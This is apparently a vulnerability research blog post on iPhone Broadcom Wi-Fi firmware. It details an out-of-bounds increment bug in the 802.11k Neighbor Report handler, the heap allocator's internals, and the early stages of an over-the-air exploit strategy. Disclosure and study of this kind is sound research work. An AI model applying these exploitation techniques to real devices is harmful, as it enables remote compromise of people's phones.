In the context of Android-resident firmware images, identifying the supported features was made easier due to the inclusion of “feature tags” within the version string embedded in the firmware’s RAM image. Each tag indicated support for a corresponding feature within the firmware image. Unfortunately, the iPhone’s Wi-Fi firmware images did away with the detailed version strings, and instead opted for a generic string containing the build type and the chip’s revision:

Nevertheless, we can still gain some insight into the firmware’s feature set, by reverse-engineering the firmware itself. Let’s take a look inside and see what we can find!
It’s Bigger On The Inside
Although most symbols have been stripped from the firmware’s ROM image, whatever symbols remain hint at the features supported by the image. Indeed, going over the strings in the combined image (mostly the ROM, the RAM is nearly devoid of strings), we come across many of the features we’ve identified in the past. Surprisingly, however, we also find a great deal of new features.
While adding features can (sometimes) result in better user experience, it’s important to remember that the Wi-Fi chip is a highly privileged component.
First, as a network interface, the chip has access to all of the host’s Wi-Fi traffic (both inbound and outbound). Therefore, attackers controlling the Wi-Fi firmware can leverage this vantage point to inject or manipulate data viewed by the host. One avenue of attack would therefore be to manipulate the host’s unencrypted web traffic and insert a browser exploit, allowing attackers to gain control over the corresponding process on the host. Other applications on the host which rely on unencrypted communications may be similarly attacked.
In addition to the aforementioned attack surface, the Wi-Fi firmware itself can carry out attacks against the host. As we’ve seen in previous blog posts, the chip communicates with the host using a variety of control messages and through a privileged physical interface (e.g., PCIe); if we were to find errors in the host’s processing of any of those, we might be able to take over the host itself (indeed, we’ll carry out such attacks in the next blog post!).

Due to the above risks, it’s important that the TCB constituted by the Wi-Fi chip remain relatively small. Any components added to the Wi-Fi firmware carry the risk of vulnerabilities being introduced into the firmware which would subsequently allow attackers to assume control over the chip (and perhaps even the entire system).
This risk is compounded by the fact that the firmware employs far fewer defence mechanisms than modern operating systems. Most notably, it does not employ ASLR, does not have stack cookies and fails to implement safe heap unlinking. Therefore, even relatively weak primitives may be exploitable within the Wi-Fi firmware (in fact, we’ll see just such an example later on!).
With that in mind, let’s take a look at the features present in the Wi-Fi firmware. It’s important to note that the mere presence of these code paths in the firmware does not imply that they are enabled by default. Rather, in most cases the host chooses whether to enable specific features, depending on user or network related configurations.
Apple-Specific Features
After some preliminary exploration, we come across a group of unfamiliar strings referencing a feature called “AWDL”. This acronym refers to “Apple Wireless Direct Link”; an Apple-specific protocol designed to provide peer-to-peer connectivity, notably used by AirDrop and AirPlay. The presence of Apple-specific functionality within the ROM affirms the suspicion that these Wi-Fi chips are used exclusively by Apple devices.
From a security perspective, it appears that the attack surface exposed by this functionality within the Wi-Fi firmware is rather limited. The firmware contains mechanisms for the configuration of AWDL-related features, but such operations are driven primarily by host-side logic (via AppleBCMWLANCore and IO80211Family).
Moving right along, we come across another group of unexpected strings:

This code originates from mDNSResponder, Apple’s open-source implementation of Multicast DNS (a standardised zero-configuration service commonly used within the Apple ecosystem).
Reverse-engineering the above fragments, we come to the realisation that it is a stripped-down version of mDNSResponder, mostly responsible for performing wake on demand via mDNS (for networks that include a Bonjour Sleep Proxy). Consequently, it does not offer all the functionality provided by a fully-fledged mDNS client. Nonetheless, embedding code from complex libraries such as mDNSResponder could carry undesired side effects.
For starters, mDNSResponder itself has been affected by several security issues in the past. More subtly, non-security bugs in libraries can become security-relevant when migrating between systems whose characteristics differ so widely from one another. Concretely, on the Wi-Fi chip address zero points to the firmware’s interrupt vectors -- a mapped, writable address. Being able to modify this address would allow attackers to gain code-execution on the chip, thereby converting a class of “benign” bugs, such as null-pointer accesses, to RCEs.
Offloading Mechanisms
Since the Wi-Fi SoC’s ARM core is less power-hungry than the application processor, it stands to reason that some network related functionality be relegated to the firmware, when possible. This concept is neither new, nor is it unique to mobile settings; offloading to the NIC occurs in desktop environments as well, primarily in the form of TCP offloading (via TOE).
Regardless, while the advantages of offloading are clear, it’s important to be aware of the potential downsides as well. For starters, as we’ve mentioned before, the more features are added into the Wi-Fi firmware, the less auditable it becomes. Additionally, offloading features often require parsing of high-level protocols. Since the Wi-Fi firmware does not contain its own TCP/IP stack, it must resort to parsing all layers in the stack manually, up to the layer at which the offloading occurs.
Inspecting the firmware reveals at least two features which allow offloading of high-level protocols to the Wi-Fi firmware: ICMPv6 offloading and TCP KeepAlive offloading. Apple’s host-side drivers contain controls for enabling and disabling these offloading features (see AppleBCMWLANCore), subsequently handing over control over these packets to the Wi-Fi firmware rather than the host.
While beyond the scope of this blog post, auditing both of the aforementioned offloading features revealed two security bugs allowing attackers to either leak constrained data from the firmware or to crash the firmware running on the Wi-Fi SoC (for more information see the bug tracker entries linked above).
Generic Attack Surfaces
While the aforementioned attack surfaces may be interesting from an exploratory point of view, each of the outlined features was rather constrained in scope. Perhaps, we could find a more fruitful attack surface within the Wi-Fi firmware?
...This is where some familiarity with the Wi-Fi standards comes in handy!
Wi-Fi frames can be split into three distinct categories. Each frame is assigned a category by inspecting the “type” and “subtype” fields in its MAC header:

The categories are as follows:
  • Data Frames - Carry data (and QoS data) over the Wi-Fi network.
  • Control Frames - Body-less frames assisting with the delivery of other frames (using ACKs, RTS/CTS, Block ACKs and more).
  • Management Frames - Perform complex operations, including connecting to a network, modifying the state of individual stations (STAs), authenticating and more.
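The classification above can be sketched in a few lines of C. This is a minimal illustration rather than the firmware's code: the helper names are our own, and the only facts assumed are the standard Frame Control layout (type in bits 2-3, subtype in bits 4-7) and the management subtype value 13 used for Action frames.

```c
#include <stdint.h>

/* Frame type values carried in bits 2-3 of the Frame Control field. */
enum wifi_frame_type {
    WIFI_TYPE_MANAGEMENT = 0,
    WIFI_TYPE_CONTROL    = 1,
    WIFI_TYPE_DATA       = 2,
    WIFI_TYPE_EXTENSION  = 3
};

/* Management subtype assigned to Action frames. */
#define WIFI_SUBTYPE_ACTION 13u

/* Frame Control is the first two bytes of the MAC header, sent
 * least-significant byte first. */
static uint16_t frame_control(const uint8_t *mac_header) {
    return (uint16_t)(mac_header[0] | (mac_header[1] << 8));
}

static enum wifi_frame_type frame_type(uint16_t fc) {
    return (enum wifi_frame_type)((fc >> 2) & 0x3);
}

static unsigned frame_subtype(uint16_t fc) {
    return (fc >> 4) & 0xFu;
}

/* Hypothetical helper: true for management frames of subtype Action. */
static int is_action_frame(const uint8_t *mac_header) {
    uint16_t fc = frame_control(mac_header);
    return frame_type(fc) == WIFI_TYPE_MANAGEMENT &&
           frame_subtype(fc) == WIFI_SUBTYPE_ACTION;
}
```

With this layout, a header starting with the byte 0xD0 is classified as an Action frame, while 0xD4 (an ACK) shares the subtype value but falls into the control category.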

Let’s take a second to consider the categories above from a security PoV.
While data frames contain interesting attack surfaces (such as frame aggregation via A-MSDU/A-MPDU), they hide little complexity otherwise. Conversely, features present directly on the RX-path, such as the aforementioned offloading mechanisms, are generally also accessible through data frames, thereby increasing the exposed attack surface. Control frames, on the other hand, offer limited complexity and therefore do not significantly contribute to the attack surface.
Unlike the first two categories, management frames are where the majority of the firmware’s complexity lies. Many of the mechanisms encapsulated by management frames make for interesting targets in their own right, including authentication and association. However, we’ll choose to focus on one subtype offering the largest attack surface of all -- Action Frames.
Most of the logic behind “advanced” Wi-Fi features (such as roaming, radio measurements, etc.) is implemented by means of Action Frames. As their name implies, these frames trigger “actions” in stations within the network, potentially modifying their state.
Curiously, unlike data frames, management frames (and therefore action frames as well) are normally unencrypted, even if networks employ security protocols such as WPA/WPA2. Instead, certain management frames can be encrypted by enabling 802.11w Protected Management Frames. When enabled, 802.11w allows for confidentiality of those frames’ contents, as well as a form of replay protection.
Summing up, action frames constitute a large portion of the attack surface -- they are mostly unprotected frames through which state-altering functionality is carried out. To discover the exact extent of their exposed attack surface, let’s explore those frames in more depth.
Action Frames
Consulting IEEE 802.11-2016 (9-47), the full list of action frame categories is quite formidable:

To illustrate the amount of complexity encapsulated by action frames, let’s return to the iPhone’s Wi-Fi firmware. Tracing our way through the RX-path, we quickly reach the function at which action frames are handled within the firmware (referred to as “wlc_recv_mgmtact” in the ROM):
wlc_recv_mgmtact - 0x1A79F4
As we can see, the function performs some preliminary operations, before handing off processing to one of the numerous handlers within the firmware. Each action frame category is delegated to a single handler. Counting the action frame handlers and corresponding frame types supported by the iPhone’s firmware, we find 13 different supported categories, resulting in 34 different supported frame types. This is a substantial attack surface to explore!
To assess the handlers’ security, we’ll reverse-engineer each of the above functions. While this is a slow and rather tedious process, recall that each vulnerability found in the above handlers implies a triggerable over-the-air vulnerability in the Wi-Fi chip.
Before attempting a manual audit, we also “fuzzed” the action frame handlers. To do so, we developed an on-chip Wi-Fi fuzzer, allowing injection of frames directly into the aforementioned handler functions (without transmitting the frames over-the-air). While the fuzzer allowed for high-speed injection of frames (namely, thousands of frames per second), running it using a small corpus of action frames and inducing bit-flips in them was unfruitful. One possible explanation for this approach’s failure is the strict structure mandated by many action frames. Perhaps these results could be improved by fuzzing based on a grammar derived from the Wi-Fi standard, or by enforcing structure constraints on the fuzzed content.

Regardless, we can employ some tricks to speed up our manual exploration. Recall that Wi-Fi primarily relies on Information Elements (IEs), tagged bundles of data, to convey information. The same principle applies to action frames -- their payloads typically consist of multiple IEs, each encapsulating different pieces of information relating to the handled frame. As the IE tags are (mostly) unique within the Wi-Fi standard, we can simply look up the tag value corresponding to each processed IE, allowing us to quickly familiarise ourselves with the surrounding code.
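To make the IE structure concrete, here is a minimal sketch of a tag-length-value walker. It assumes only the standard IE encoding (a 1-byte tag, a 1-byte length, then that many bytes of data); the function name is hypothetical and this is not the firmware's own parser.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: returns a pointer to the first IE carrying `tag`,
 * or NULL if no such IE exists or an IE would run past the buffer's end. */
static const uint8_t *find_ie(const uint8_t *buf, size_t len, uint8_t tag) {
    size_t off = 0;
    while (len - off >= 2) {              /* room for the tag and length bytes */
        size_t ie_len = buf[off + 1];
        if (ie_len > len - off - 2)
            return NULL;                  /* truncated IE: stop parsing */
        if (buf[off] == tag)
            return buf + off;
        off += 2 + ie_len;                /* skip header and payload */
    }
    return NULL;
}
```

When reading a handler, spotting a comparison against a constant tag value (for example 52) next to a loop of this shape is usually enough to identify which element the code is processing.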
After going through the handlers outlined above, we identified a number of vulnerabilities.
First, we discovered a vulnerability in 802.11v Wireless Network Management (WNM). WNM is a set of standards allowing clients to configure themselves within a wireless network and to exchange information about the network’s topology. Within the WNM category, the “WNM Sleep Mode Response” frame serves to update the Group Temporal Key (GTK) when the set of peers in the network changes. As it happens, reverse-engineering the WNM handler revealed that the corresponding function failed to verify the length of the encapsulated GTK, thereby triggering a controlled heap overflow (see the bug tracker for more information).
By cross-referencing the GTK handling method, we were able to identify a similar vulnerability in 802.11r Fast BSS Transition (FBT). Once again, the firmware failed to verify the GTK’s length, resulting in a heap overflow.
While both of the above vulnerabilities are interesting in their own right, we will not discuss them any further in this blog post. Instead, we’ll focus on a different vulnerability altogether; one with a weaker primitive. By demonstrating how even relatively “weak” primitives can be exploited on the Wi-Fi firmware, we’ll showcase the need for stronger exploit mitigations.
To make matters more interesting, we’ll construct our entire exploit using nothing but action frames. These frames are so feature-rich, that by leveraging them we will be able to perform heap shaping, create allocation primitives, and of course, trigger the vulnerability itself.
802.11k Radio Resource Management
802.11k is an amendment to the Wi-Fi standard aiming to bring Radio Resource Management (RRM) capabilities to Wi-Fi networks. RRM-capable stations in the network are able to perform radio measurements (and receive them), allowing access points to reduce the congestion and improve traffic utilisation in the network. The concept itself is not new in the mobile sphere; in fact, it’s been around in cellular networks for over two decades.
Within the Wi-Fi ecosystem, RRM is commonly utilised in tandem with 802.11r FBT (or the proprietary CCKM) to enable seamless access point assisted roaming. As stations decide to “handover” to different access points (based on their radio measurements), they can consult the access points within the network in order to obtain a list of potential neighbours with which they may reassociate.
To implement all of the above, a set of action frames (and a new action category) have been added to the Wi-Fi standard. Consequently, clients can perform radio and link measurement requests, receive the corresponding reports, and even process reports containing their neighbouring access points (should they decide to roam).
All of the above functionality is also present in the Wi-Fi firmware on the iPhone:

Auditing the handlers above, we come across one function of particular note: the handler for Neighbor Report Response frames.
The Vulnerability
Neighbor Report Response (NRREP) frames are reports delivered from the access point to stations in the network, informing stations of neighbouring access points in their vicinity. Upon roaming, the stations may use these parameters to reassociate with the aforementioned neighbours. Providing this information spares the stations the need to perform extensive scans on their own -- a rather time consuming operation. Instead, they may simply rely on the report, which informs them of the specific channels and operating classes inhabited by each neighbour.
Like many action frames, NRREPs also contain a “dialog token”. This 1-byte field is used to correlate between requests issued by a client and their corresponding responses. As their name implies, Neighbour Report Responses are typically transmitted in response to a corresponding request made by the client earlier on (commonly as a result of a radio measurement indicating that a roam may be imminent). As we’d expect, upon sending a Neighbor Report Request, the client generates and embeds a dialog token, which is later verified by it when processing the corresponding NRREP returned by the access point.
However, reading more carefully through the specification reveals another interesting scenario! It appears that NRREPs may also be entirely unsolicited. In such a case, the dialog token is simply set to zero, indicating that no matching request exists.
IEEE 802.11-2016,
Consequently, NRREPs may be transmitted over the network to any client at any time, so long as it supports 802.11k RRM. Upon reception of such a report (with a zeroed dialog token), the client will simply parse the report and handle the data therein.
Continuing to read through the standard, we can piece together the frame’s overall structure, starting from the action frame header, all the way to the encapsulated IE:

As we can see above, the bulk of the data in the NRREP frame is conveyed through the “Neighbour Report” IE. NRREPs may contain one or more such IEs, each indicating the presence of a single neighbour.
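As an illustration of that structure, the sketch below assembles the body of an unsolicited NRREP carrying a single Neighbour Report IE. It assumes the standard field layout (Radio Measurement category 5, Neighbor Report Response action 5, element tag 52, and a 13-byte minimum element body); the function name and the choice to zero the BSSID Information and PHY Type fields are ours, for illustration only.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CATEGORY_RADIO_MEASUREMENT  5   /* action category added by 802.11k */
#define ACTION_NEIGHBOR_REPORT_RESP 5   /* Neighbor Report Response */
#define IE_NEIGHBOR_REPORT          52  /* Neighbour Report element tag */
#define NEIGHBOR_REPORT_MIN_LEN     13  /* BSSID(6) + BSSID Info(4) + class + channel + PHY */
#define NRREP_BODY_LEN (3 + 2 + NEIGHBOR_REPORT_MIN_LEN)

/* Hypothetical builder: writes the action frame body (everything after the
 * MAC header) and returns its length, or 0 if `out` is too small. */
static size_t build_nrrep(uint8_t *out, size_t out_len, const uint8_t bssid[6],
                          uint8_t op_class, uint8_t channel) {
    if (out_len < NRREP_BODY_LEN)
        return 0;
    memset(out, 0, NRREP_BODY_LEN);

    /* Action header: category, action, dialog token */
    out[0] = CATEGORY_RADIO_MEASUREMENT;
    out[1] = ACTION_NEIGHBOR_REPORT_RESP;
    out[2] = 0;                          /* zero token marks an unsolicited report */

    /* Neighbour Report IE: tag, length, then the fixed fields */
    uint8_t *ie = out + 3;
    ie[0] = IE_NEIGHBOR_REPORT;
    ie[1] = NEIGHBOR_REPORT_MIN_LEN;
    memcpy(ie + 2, bssid, 6);            /* BSSID */
    /* ie[8..11]: BSSID Information, left zeroed in this sketch */
    ie[12] = op_class;                   /* Operating Class */
    ie[13] = channel;                    /* Channel Number */
    /* ie[14]: PHY Type, left zeroed in this sketch */
    return NRREP_BODY_LEN;
}
```

The offsets are the ones a receiver would index relative to the start of the IE: the BSSID at offset 2, the operating class at offset 12 and the channel number at offset 13.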
Now that we have a firm understanding of the frame’s structure, let’s take a look at the firmware’s implementation of the functionality described above. Following along from the initial NRREP handler, we quickly come to a ROM function responsible for handling the reports. Reverse-engineering the function, we arrive at the following high-level logic:
1.  int wlc_rrm_recv_nrrep(void* ctx, ..., uint8_t* body, uint32_t bodylen) {
2.      //Ensuring the request is valid
3.      if (bodylen <= 2 || !g_rrm_enabled || body[2] != stored_dialog_token)
4.          ... //Handle error
5.
6.      //Freeing all the previously stored reports
7.      free_previous_nrreps(ctx, ...);
8.
9.      //Stripping the action Header
10.     uint8_t* report_ie = body + 3;
11.     bodylen -= 3;
12.
13.     //Searching for the report IE
14.     do {
15.         ... //Verify the IE is valid
16.         if (report_ie[0] == 52 && report_ie[1] > 0xC) //Tag, Length
17.             break; //Found a matching IE!
18.     } while (report_ie = bcm_next_tlv(report_ie, &bodylen));
19.     if (!report_ie)
20.         ... //Handle error
21.
22.     //Handle the report
23.     uint8_t* nrrep_data = malloc(28);
24.     if (!nrrep_data)
25.         ... //Handle error
26.
27.     memcpy(nrrep_data + 6, report_ie + 2, 6); //Copying the BSSID
28.     ...                                       //Copying other elements...
29.     nrrep_data[16] = report_ie[12];           //Operational Class
30.     nrrep_data[17] = report_ie[13];           //Channel Number
31.
32.     //Processing the report
33.     void* elem = wlc_rrm_regclass_neighbor_count(ctx, nrrep_data, ...);
34.     ...
35. }
As we can see above, the function begins by performing some cursory validation of the received request. Namely, it ensures that RRM is enabled within the network, that the report is sufficiently long, and that the received dialog token matches the stored one (if a solicited request was initiated by the client, otherwise the stored token is set to zero).
After performing the necessary validations and locating the report IE, the function proceeds to extract the encoded report information and store it within a structure of its own. Finally, the newly created structure is passed on for processing within wlc_rrm_regclass_neighbor_count. Let’s take a closer look:
1.  void* wlc_rrm_regclass_neighbor_count(void* ctx, uint8_t* nrrep_data, ...) {
2.
3.      //Searching for previous stored elements with the same Operational
4.      //Class and Channel Number
5.      if (find_nrrep_buffer_and_inc_channel_idx(ctx, nrrep_data, ...))
6.          return NULL;
7.
8.      //Creating a new element to hold the NRREP data
9.      uint8_t* elem = zalloc(456);
10.     if (!elem)
11.         ... //Handle error
12.     elem[4] = nrrep_data[16];                  //Operational Class
13.     ((uint16_t*)(elem + 6))[nrrep_data[17]]++; //Channel Number
14.
15.     //Adding the element to the linked list of stored NRREPs
16.     *((uint8_t**)elem) = ctx->previous_elem;
17.     ctx->previous_elem = elem;
18.     return elem;
19. }
As shown in the snippet above, the firmware keeps a linked list of buffers, one per “Operational Class”. Each buffer is 456 bytes long, and contains the operational class, an array holding the number of neighbours per channel, and a pointer to the next buffer in the list.
While not shown above, find_nrrep_buffer_and_inc_channel_idx performs a similar task - it goes over each element in the list, looking for an entry matching the current operational class. Upon finding a matching element, it increments the neighbour count at the index corresponding to the given channel number, and returns 1, indicating success.
So why are these handlers interesting? Consider that valid 802.11 channel numbers range from 1-14 in the 2.4GHz spectrum, all the way up to 196 in the 5GHz spectrum. Since each neighbour count field in the array above is 16 bits wide, we can deduce that the neighbour count array holds 225 entries ((456 - 6)/sizeof(uint16_t) == 225), and can therefore be used to reference channel numbers from 0 up to 224.
However, looking a little closer it appears that the functions above make no attempt to validate the Channel Number field! Therefore, malicious attackers can encode whatever value they desire in that field (up to 255). Encoding a value larger than 224 will therefore trigger a 16-bit increment to be performed out-of-bounds (see line 13), thereby corrupting memory after the NRREP buffer!
Understanding The Primitive
Before we move on, let’s take a second to understand the exploit primitive -- as mentioned above, we are able to perform 16-bit increments (which are also 16-bit aligned), spanning up to 60 bytes beyond our allocated buffer.
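The reach of the primitive follows directly from the buffer's layout. The sketch below works through the arithmetic, assuming only what the snippets above show: a 456-byte element whose 16-bit counters start at byte offset 6 and are indexed by the 1-byte channel number. The helper names are hypothetical.

```c
#include <stdint.h>

#define NRREP_ELEM_SIZE 456u  /* size of the linked list element */
#define COUNTS_OFFSET   6u    /* the counter array starts at elem + 6 */

/* Byte offset, from the start of the element, of the counter that a given
 * channel number selects. */
static unsigned count_byte_offset(uint8_t channel) {
    return COUNTS_OFFSET + (unsigned)channel * (unsigned)sizeof(uint16_t);
}

/* True when the whole 16-bit counter lies inside the element. */
static int channel_in_bounds(uint8_t channel) {
    return count_byte_offset(channel) + sizeof(uint16_t) <= NRREP_ELEM_SIZE;
}

/* Distance of the selected counter past the end of the element
 * (negative while the counter is still in bounds). */
static int bytes_past_end(uint8_t channel) {
    return (int)count_byte_offset(channel) - (int)NRREP_ELEM_SIZE;
}
```

Channel 224 selects the last in-bounds counter (bytes 454 and 455), channel 225 selects the half-word immediately following the buffer, and channel 255 selects the half-word starting 60 bytes past its end. A check along the lines of `channel_in_bounds` is what the handlers lack.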
Oddly, while the standards specify that each NRREP may contain several encoded reports (each of which should be handled by the receiving station), it appears that the handler functions above only process a single IE at a time. Therefore, each NRREP we send will be able to trigger a single OOB increment.
This last fact ties in rather annoyingly with another quirk in the firmware’s code -- namely, upon reception of each NRREP, the list of stored NRREP elements is freed before proceeding to process the current element (see line 7, where free_previous_nrreps is invoked). It remains unclear whether this is intended behaviour or a bug, but the immediate consequence of this oddity is that following each OOB increment, the buffers are subsequently freed, allowing other objects to take their place.
Lastly, the reception of each NRREP triggers two allocations of distinct sizes; one for the linked list element (456 bytes), and another to store the report’s data (28 bytes). As a result, any heap shaping or grooming we’ll perform will have to take both allocations into consideration.
Triggering The Vulnerability
Configuring The Network
To begin developing our exploit, we’ll use the same test network environment we described in the previous blog post, using the following topology:

As we’re going to leverage NRREPs, it’s important to set up our test network to support neighbour reports. Like many auxiliary Wi-Fi features, support for NRREPs is indicated by setting the corresponding bit in the capability IEs broadcast in the network’s beacon. RRM-related functionality is encoded using the “RM Enabled Capabilities” information element.
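A station (or a packet capture script) could check for this capability roughly as follows. This is a sketch under stated assumptions: the "RM Enabled Capabilities" element uses tag 70, and neighbour report support is bit 1 of its first capability byte. The function name is ours, and the input is assumed to be the IE portion of a beacon body.

```c
#include <stddef.h>
#include <stdint.h>

#define IE_RM_ENABLED_CAPABILITIES 70    /* element tag (assumed from the standard) */
#define RM_CAP_NEIGHBOR_REPORT     0x02  /* bit 1 of the first capability byte */

/* Hypothetical helper: scans a beacon's IEs and reports whether the network
 * advertises support for neighbour reports. */
static int beacon_supports_neighbor_report(const uint8_t *ies, size_t len) {
    size_t off = 0;
    while (len - off >= 2) {
        size_t ie_len = ies[off + 1];
        if (ie_len > len - off - 2)
            return 0;                    /* malformed IE list */
        if (ies[off] == IE_RM_ENABLED_CAPABILITIES && ie_len >= 1)
            return (ies[off + 2] & RM_CAP_NEIGHBOR_REPORT) != 0;
        off += 2 + ie_len;
    }
    return 0;                            /* element not present */
}
```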
Since we’re using hostapd to broadcast our network, we’ll enable the rrm_neighbor_report setting in our network’s configuration. Enabling this feature should set the corresponding field in the “RM Enabled Capabilities” IE to indicate support for neighbour reports. Let’s inspect a beacon frame to make sure:

Alright, seems like our network configuration is valid! Next, we’ll want to construct an interface allowing us to send arbitrary neighbour reports to peers in the network.
To do so, we’ll extend hostapd by adding new commands to its control interface. Each new command will correspond to a single frame type we’d like to inject. After adding our code to hostapd, we can simply connect to the control interface and issue the corresponding commands, thereby triggering the transmission of the requested frames from the access point to the selected peer. You can find our patches to hostapd in the exploit bundle on the bug tracker.

It should be noted that this approach is not infallible. Since we’re utilising a SoftMAC dongle to transmit our internal network, the SoftMAC layer of the Linux Kernel is responsible for some of the MLME processing done on the host. Therefore, it’s possible that processing done by this layer will interfere with the frames we wish to send (or receive) during the exploit’s flow. To get around this limitation, we’ve taken care to construct the frames in a manner that does not clash with Linux’s SoftMAC stack.
Sending NRREPs
After configuring and broadcasting our network, we can finally attempt to trigger the vulnerability itself. This brings us to a rather important question; how will we know whether the vulnerability was triggered successfully or not? After all, a single 16-bit increment may be insufficient to cause significant corruption of the firmware’s memory. Therefore it’s entirely possible that while the OOB access will occur, the firmware will happily chug along without crashing, leaving no observable effects indicating the vulnerability was triggered.
Remembering our Wi-Fi debugger from the previous blog post, one course of action immediately springs to mind -- why not simply hook the NRREP processing function with our own handler, and see whether our handler is invoked upon transmitting a malicious NRREP? This is easier said than done; it turns out most of the NRREP handling functionality (especially the actual vulnerability trigger, which we’re interested in) is located within the ROM, preventing us from inserting a hook.
As luck would have it, a new feature developed by Broadcom can be leveraged to solve this issue. To allow tracing different parts of the firmware’s logic, including the ROM, Broadcom have introduced a set of logging functions embedded throughout the firmware. Curiously, this mechanism was not present in the Android-resident firmwares we had analysed in the past.
Reverse-engineering this mechanism, it appears to operate in the following manner: each trace is assigned an identifier, ranging from 0x0 to 0x50. When a trace is requested, the firmware inspects an internal array of the same size stored in the firmware’s RAM, to gauge whether the trace with the given identifier has been enabled or not. Each identifier has a corresponding 8-bit mask representing the types of traces enabled for it. As we are able to access the firmware’s RAM, we can simply enable any trace we like by setting the corresponding bits in the trace array. Subsequently, traces with the same ID will be outputted to the firmware’s console, allowing us to handily dump them using our Wi-Fi firmware debugger.
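The mechanism can be modelled in a few lines. The sketch below is a host-side stand-in, not the firmware's code: the array name, the function names and the meaning of individual mask bits are assumptions, and on the real target the array lives in the firmware's RAM and would be modified through the debugger's memory-write primitive.

```c
#include <stdint.h>

#define TRACE_ID_MAX 0x50u   /* identifiers range from 0x0 to 0x50 */

/* Stand-in for the per-identifier mask array held in firmware RAM. */
static uint8_t trace_masks[TRACE_ID_MAX + 1];

/* Enables the trace types in `mask` for one identifier.
 * Returns 0 on success, -1 if the identifier is out of range. */
static int trace_enable(unsigned id, uint8_t mask) {
    if (id > TRACE_ID_MAX)
        return -1;
    trace_masks[id] |= mask;
    return 0;
}

/* Mirrors the check performed before a trace is emitted: the trace is
 * printed only if its type bit is set for its identifier. */
static int trace_enabled(unsigned id, uint8_t type_bit) {
    return id <= TRACE_ID_MAX && (trace_masks[id] & type_bit) != 0;
}
```

Setting every bit in an identifier's mask (0xFF) is the simplest way to make sure all trace types for that identifier reach the console.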

This functionality has also been incorporated into our Wi-Fi debugger, which exposes functions to read and modify the log status array as well as an API to read out the firmware’s console.
Using the above API, we can now enable the traces referenced in the NRREP’s ROM handlers. Taking a closer look at the NRREP handling function in the firmware, we come across the following traces:

Alright, so we’ll need to enable log identifier 0x16 to observe these traces. After enabling the trace, sending an NRREP and reading out the firmware’s console, we are greeted with the following result:

Great! Our traces are being hit, indicating that the NRREP is successfully received by the station. With that, let’s move on to the next step - devising an exploit strategy.
An Exploit Strategy
Understanding The Heap
Since the vulnerability in question is a heap memory corruption, it’s important that we take a second to familiarise ourselves with the allocator’s implementation. In short, it is a “best-fit” allocator, which performs forward and backward coalescing, and keeps a singly linked list of free chunks. When chunks are allocated, they are carved from the end (highest address) of the best-fitting free chunk (smallest chunk that is large enough).
Free chunks consist of a 32-bit size field and a 32-bit “next” pointer, followed by the chunk’s contents. In-use chunks contain a single 32-bit size field, of which the top 30 bits denote the chunk’s size, and the bottom 2 bits indicate status bits. Putting it together, we arrive at the following layout:
Sketching An Exploit Strategy
Before we rush ahead, let’s begin by devising a strategy. We already know that our exploit primitive allows us to perform 16-bit increments, spanning up to 60 bytes beyond our allocated buffer.

It’s important to note that the heap’s state, perhaps surprisingly, is incredibly stable -- few to no allocations are performed. What few allocations are made are immediately freed thereafter. As for frames carrying traffic (received or transmitted), they are not carved from the heap, but rather drawn from a special “pool”. As such, the presence of traffic should not affect the heap’s state.
The heap’s stability is a double-edged sword; on the one hand, we are guaranteed relative convenience when shaping and modifying the heap’s state, as no allocations other than our own will interfere with the heap’s structure. On the other hand, the set of allocations that can be made (and subsequently, targeted by us using the vulnerability primitive) is limited.
Indeed, going over the action frame handlers and searching for objects which may serve as viable targets for modification, we come up empty handed. The only data types that may be allocated either store their “interesting” data farther than 56 bytes away from their origin (accounting for the in-use chunk’s header), or simply do not contain “interesting” data for modification.
Perhaps, instead, we could leverage the heap itself to hijack the control flow? If we were able to hijack the “next” pointer of a free chunk and subsequently point it at a location of our choosing, we could overwrite the target address with a subsequent allocation’s contents. This prospect sounds rather alluring, so let’s try and pursue this route.
Writing An Exploit
Hijacking A Free Chunk
To hijack a free chunk, we’ll need to commandeer a chunk’s “next” pointer. Recall that our exploit primitive allows us some degree of control over neighbouring data structures. As such, let’s consider the following placement in which a free chunk is within range of the NRREP buffer:

Leveraging our OOB increment, we can directly modify the chunk’s “next” pointer by sending an NRREP with the corresponding channel number. Naively, this would allow us to gain control over a free chunk in the heap, by simply directing the “next” pointer at a location of our choosing.
However, this approach turns out to be infeasible.
In order to direct the “next” pointer at a meaningful address, we’d have to either know its value in advance (in order to calculate the number of increments required to convert the pointer from its current value to the target value), or we’d have to know the relative offset between its current value and the desired target.
As we do not know the exact addresses of heap chunks (nor would we want to resort to guessing them), the former option is ruled out. What about the latter approach? Recall that our primitive allows for 16-bit increments. Therefore, we can either increase the pointer’s value by 1 (by incrementing the bottom half-word), or by 65536 (by incrementing the top half-word).
Incrementing the pointer by 1 will result in an unaligned chunk address in the freelist. Recall, however, that our vulnerability primitive triggers deallocations on every invocation. As it happens, the allocator’s “free” function validates that each chunk in the freelist is aligned. When an unaligned block is encountered, it generates a fault and halts the firmware. Thus, an increment of the bottom half-word will result in the firmware crashing.
Incrementing the top half-word similarly fails; since all the heap’s chunks are less than 65536 bytes away from the RAM’s end address, incrementing the top half-word will result in the “free” function attempting to access memory beyond the RAM, triggering an access violation and halting the firmware.
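Both failure modes are easy to reproduce on paper. The following sketch models a single 16-bit increment applied to either half of a 32-bit "next" pointer, then applies the two conditions described above. The 4-byte alignment requirement and the function names are assumptions made for illustration.

```c
#include <stdint.h>

#define CHUNK_ALIGNMENT 4u   /* assumed alignment enforced by "free" */

/* One OOB increment landing on the pointer's bottom half-word. */
static uint32_t inc_low_halfword(uint32_t ptr) {
    uint16_t lo = (uint16_t)(ptr & 0xFFFFu);
    lo++;                                /* wraps within 16 bits, no carry */
    return (ptr & 0xFFFF0000u) | lo;
}

/* One OOB increment landing on the pointer's top half-word. */
static uint32_t inc_high_halfword(uint32_t ptr) {
    uint16_t hi = (uint16_t)(ptr >> 16);
    hi++;
    return ((uint32_t)hi << 16) | (ptr & 0xFFFFu);
}

/* Models the two conditions under which walking the freelist survives:
 * the chunk address is aligned and lies below the end of RAM. */
static int chunk_ptr_ok(uint32_t ptr, uint32_t ram_end) {
    return (ptr % CHUNK_ALIGNMENT) == 0 && ptr < ram_end;
}
```

Taking a made-up chunk address of 0x0021F000 and a made-up RAM end of 0x00220000, the low increment yields 0x0021F001 (unaligned) and the high increment yields 0x0022F000 (past the end of RAM), so neither result passes `chunk_ptr_ok`.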
So how can we commandeer a free chunk nevertheless?
